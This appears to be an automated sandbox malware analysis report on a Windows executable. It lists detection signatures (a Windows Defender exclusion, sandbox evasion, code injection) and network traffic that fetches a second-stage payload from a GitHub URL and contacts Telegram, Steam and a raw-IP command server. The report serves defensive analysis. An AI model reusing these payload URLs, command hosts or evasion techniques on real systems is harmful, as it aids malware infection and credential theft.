Windows Analysis Report
YYjRtxS70h.exe

Overview

General Information

Sample name:	YYjRtxS70h.exe renamed because original name is a hash value
Original sample name:	5a59ce92b07de68c0be8fbd7944214e2.exe
Analysis ID:	1579768
MD5:	5a59ce92b07de68c0be8fbd7944214e2
SHA1:	b0536d674552c3a11a881b154b668af1b5222641
SHA256:	e09ff2bd97040748812f0434e277b6623ac9aff565fc11003f9abfeeabe9110a
Tags:	exeuser-abuse_ch
Infos:

Detection

Score:	88
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

AI detected suspicious sample

Adds a directory exclusion to Windows Defender

Loading BitLocker PowerShell Module

Machine Learning detection for dropped file

Machine Learning detection for sample

PE file has a writeable .text section

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Allocates memory with a write watch (potentially for evading sandboxes)

Binary contains a suspicious time stamp

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Contains functionality to call native functions

Contains functionality to read the PEB

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Dropped file seen in connection with other malware

Drops PE files

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

HTTP GET or POST without a user agent

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

PE file contains sections with non-standard names

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: Powershell Defender Exclusion

Suricata IDS alerts with low severity for network traffic

Uses Microsoft's Enhanced Cryptographic Provider

Uses code obfuscation techniques (call, push, ret)

Classification

Signatures

AV Detection

Multi AV Scanner detection for dropped file

Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe

ReversingLabs: Detection: 63%

Multi AV Scanner detection for submitted file

Source: YYjRtxS70h.exe	Virustotal: Detection: 62%			Perma Link
Source: YYjRtxS70h.exe	ReversingLabs: Detection: 65%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 99.3% probability

Machine Learning detection for dropped file

Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe

Joe Sandbox ML: detected

Machine Learning detection for sample

Source: YYjRtxS70h.exe

Joe Sandbox ML: detected

Uses Microsoft's Enhanced Cryptographic Provider

Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe

Code function: 14_2_0041FC3B CryptStringToBinaryA,CryptStringToBinaryA,

14_2_0041FC3B

Source: unknown	HTTPS traffic detected: 20.233.83.145:443 -> 192.168.2.8:49708 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.199.110.133:443 -> 192.168.2.8:49709 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.8:49710 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.8:49711 version: TLS 1.2

Source: YYjRtxS70h.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:

Binary string: C:\Users\danie\source\repos\Qwest\Qwest\obj\Debug\Qwest.pdb source: YYjRtxS70h.exe

Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_0041E359 FindFirstFileA,FindFirstFileA,	14_2_0041E359
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_00420370 FindFirstFileA,FindFirstFileA,	14_2_00420370
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_0042498B FindFirstFileA,FindFirstFileA,	14_2_0042498B

Found inlined nop instructions (likely shell or obfuscated code)

Source: C:\Users\user\Desktop\YYjRtxS70h.exe

Code function: 4x nop then mov dword ptr [ebp-18h], 00000000h

0_2_02832309

HTTP GET or POST without a user agent

Source: global traffic	HTTP traffic detected: GET /olosha1/pockket/raw/refs/heads/main/jtkhikadjthsad.exe HTTP/1.1Host: github.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /olosha1/pockket/refs/heads/main/jtkhikadjthsad.exe HTTP/1.1Host: raw.githubusercontent.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /m3wm0w HTTP/1.1Host: t.meConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /profiles/76561199804377619 HTTP/1.1Host: steamcommunity.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /m3wm0w HTTP/1.1Host: t.meConnection: Keep-AliveCache-Control: no-cacheCookie: stel_ssid=d6d3627e300141e072_9285031639468439323
Source: global traffic	HTTP traffic detected: GET /profiles/76561199804377619 HTTP/1.1Host: steamcommunity.comConnection: Keep-AliveCache-Control: no-cacheCookie: sessionid=a683bfea8aad978e31b0518e; steamCountry=US%7C185ce35c568ebbb18a145d0cabae7186
Source: global traffic	HTTP traffic detected: GET /m3wm0w HTTP/1.1Host: t.meConnection: Keep-AliveCache-Control: no-cacheCookie: stel_ssid=d6d3627e300141e072_9285031639468439323
Source: global traffic	HTTP traffic detected: GET /profiles/76561199804377619 HTTP/1.1Host: steamcommunity.comConnection: Keep-AliveCache-Control: no-cacheCookie: sessionid=a683bfea8aad978e31b0518e; steamCountry=US%7C185ce35c568ebbb18a145d0cabae7186

IP address seen in connection with other malware

Source: Joe Sandbox View	IP Address: 104.102.49.254 104.102.49.254
Source: Joe Sandbox View	IP Address: 20.233.83.145 20.233.83.145

JA3 SSL client fingerprint seen in connection with other malware

Source: Joe Sandbox View	JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Joe Sandbox View	JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Suricata IDS alerts with low severity for network traffic

Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.8:49712 -> 37.27.43.98:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.8:49716 -> 37.27.43.98:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.8:49721 -> 37.27.43.98:443

Source: unknown	TCP traffic detected without corresponding DNS query: 37.27.43.98
Source: unknown	TCP traffic detected without corresponding DNS query: 37.27.43.98
Source: unknown	TCP traffic detected without corresponding DNS query: 37.27.43.98
Source: unknown	TCP traffic detected without corresponding DNS query: 37.27.43.98
Source: unknown	TCP traffic detected without corresponding DNS query: 37.27.43.98
Source: unknown	TCP traffic detected without corresponding DNS query: 37.27.43.98
Source: unknown	TCP traffic detected without corresponding DNS query: 37.27.43.98
Source: unknown	TCP traffic detected without corresponding DNS query: 37.27.43.98
Source: unknown	TCP traffic detected without corresponding DNS query: 37.27.43.98
Source: unknown	TCP traffic detected without corresponding DNS query: 37.27.43.98
Source: unknown	TCP traffic detected without corresponding DNS query: 37.27.43.98
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe

Code function: 14_2_00418024 InternetReadFile,

14_2_00418024

Source: global traffic	HTTP traffic detected: GET /olosha1/pockket/raw/refs/heads/main/jtkhikadjthsad.exe HTTP/1.1Host: github.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /olosha1/pockket/refs/heads/main/jtkhikadjthsad.exe HTTP/1.1Host: raw.githubusercontent.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /m3wm0w HTTP/1.1Host: t.meConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /profiles/76561199804377619 HTTP/1.1Host: steamcommunity.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /m3wm0w HTTP/1.1Host: t.meConnection: Keep-AliveCache-Control: no-cacheCookie: stel_ssid=d6d3627e300141e072_9285031639468439323
Source: global traffic	HTTP traffic detected: GET /profiles/76561199804377619 HTTP/1.1Host: steamcommunity.comConnection: Keep-AliveCache-Control: no-cacheCookie: sessionid=a683bfea8aad978e31b0518e; steamCountry=US%7C185ce35c568ebbb18a145d0cabae7186
Source: global traffic	HTTP traffic detected: GET /m3wm0w HTTP/1.1Host: t.meConnection: Keep-AliveCache-Control: no-cacheCookie: stel_ssid=d6d3627e300141e072_9285031639468439323
Source: global traffic	HTTP traffic detected: GET /profiles/76561199804377619 HTTP/1.1Host: steamcommunity.comConnection: Keep-AliveCache-Control: no-cacheCookie: sessionid=a683bfea8aad978e31b0518e; steamCountry=US%7C185ce35c568ebbb18a145d0cabae7186

Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A12000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.cloudflare.steamstatic.com/ https://cdn.cloudflare.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.cloudflare.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://.valvesoftware.com https://.steambeta.net https://.discovery.beta.steamserver.net https://.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/; equals www.youtube.com (Youtube)
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2565990031.0000000000AAA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Content-Security-Policydefault-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.cloudflare.steamstatic.com/ https://cdn.cloudflare.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.cloudflare.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://.valvesoftware.com https://.steambeta.net https://.discovery.beta.steamserver.net https://.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/;) equals www.youtube.com (Youtube)
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.1837734458.0000000000A78000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Content-Security-Policydefault-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.cloudflare.steamstatic.com/ https://cdn.cloudflare.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.cloudflare.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://.valvesoftware.com https://.steambeta.net https://.discovery.beta.steamserver.net https://.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/;a( equals www.youtube.com (Youtube)
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2522942160.0000000000A78000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: t-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/; equals www.youtube.com (Youtube)

Source: global traffic	DNS traffic detected: DNS query: github.com
Source: global traffic	DNS traffic detected: DNS query: raw.githubusercontent.com
Source: global traffic	DNS traffic detected: DNS query: t.me
Source: global traffic	DNS traffic detected: DNS query: steamcommunity.com

Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2565990031.0000000000AAA000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201799460.0000000000A98000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2158798637.0000000000A45000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201845024.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A12000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://127.0.0.1:27060
Source: powershell.exe, 00000005.00000002.1561429732.0000000007723000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.mi
Source: powershell.exe, 00000005.00000002.1563697900.00000000086C2000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1610889169.000000000780F000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1703471346.0000000006ED0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.micro
Source: powershell.exe, 00000005.00000002.1563697900.00000000086C2000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1610889169.000000000784D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.microsoft
Source: YYjRtxS70h.exe, 00000000.00000002.1791353691.0000000002A4F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://github.com
Source: YYjRtxS70h.exe, 00000000.00000002.1791353691.0000000002A4F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://github.comd
Source: powershell.exe, 00000005.00000002.1558683585.0000000006089000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1606744691.00000000061B9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1672248672.0000000005F28000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 0000000D.00000002.1655620114.0000000005015000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: YYjRtxS70h.exe, 00000000.00000002.1791353691.0000000002A92000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://raw.githubusercontent.com
Source: YYjRtxS70h.exe, 00000000.00000002.1791353691.0000000002A92000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://raw.githubusercontent.comd
Source: powershell.exe, 00000005.00000002.1555257254.0000000005177000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1596759724.00000000052A6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1655620114.0000000005015000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: YYjRtxS70h.exe, 00000000.00000002.1791353691.00000000029B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1567151650.0000000004414000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1555257254.0000000005021000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1619557449.000000000480D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1596759724.0000000005151000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1695247796.0000000004679000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1655620114.0000000004EC1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000005.00000002.1555257254.0000000005177000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1596759724.00000000052A6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1655620114.0000000005015000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2522942160.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201845024.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2158798637.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2748505795.0000000000493000.00000004.00000001.01000000.00000008.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000AAA000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2178005887.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 76561199804377619[1].htm.14.dr, 76561199804377619[1].htm0.14.dr	String found in binary or memory: http://store.steampowered.com/account/cookiepreferences/
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2522942160.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2748291843.0000000000193000.00000004.00000010.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201845024.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2158798637.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2748505795.0000000000493000.00000004.00000001.01000000.00000008.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000AAA000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2178005887.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 76561199804377619[1].htm.14.dr, 76561199804377619[1].htm0.14.dr	String found in binary or memory: http://store.steampowered.com/privacy_agreement/
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2522942160.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201845024.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2158798637.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2748505795.0000000000493000.00000004.00000001.01000000.00000008.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000AAA000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2178005887.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 76561199804377619[1].htm.14.dr, 76561199804377619[1].htm0.14.dr	String found in binary or memory: http://store.steampowered.com/subscriber_agreement/
Source: powershell.exe, 0000000D.00000002.1655620114.0000000005015000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 0000000A.00000002.1610889169.000000000780F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.microsoft.coU
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.1837635638.0000000000A3A000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2522942160.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2565990031.0000000000A9A000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201845024.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2158798637.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2748505795.0000000000493000.00000004.00000001.01000000.00000008.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000AAA000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201799460.0000000000A91000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2178005887.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 76561199804377619[1].htm.14.dr, 76561199804377619[1].htm0.14.dr	String found in binary or memory: http://www.valvesoftware.com/legal.htm
Source: 76561199804377619[1].htm0.14.dr	String found in binary or memory: https://37.27.43.98
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2178005887.0000000000A47000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2523079878.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2522942160.0000000000A45000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2158798637.0000000000A47000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201845024.0000000000A41000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://37.27.43.98/
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A41000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://37.27.43.98/(
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2158798637.0000000000A47000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://37.27.43.98/5
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A41000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://37.27.43.98/://Z
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2158798637.0000000000A47000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://37.27.43.98/A
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2522942160.0000000000A45000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://37.27.43.98/B_F
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2178005887.0000000000A47000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2158798637.0000000000A47000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201845024.0000000000A41000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://37.27.43.98/T
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2158798637.0000000000A47000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://37.27.43.98/icate
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A41000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://37.27.43.98/n
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A31000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://37.27.43.98/r
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2178005887.0000000000A47000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2522942160.0000000000A45000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2158798637.0000000000A47000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201845024.0000000000A41000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://37.27.43.98/rG8
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A41000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://37.27.43.98/s
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2522942160.0000000000A45000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://37.27.43.98/v
Source: powershell.exe, 00000007.00000002.1619557449.0000000004839000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1695247796.00000000046A5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore6LR
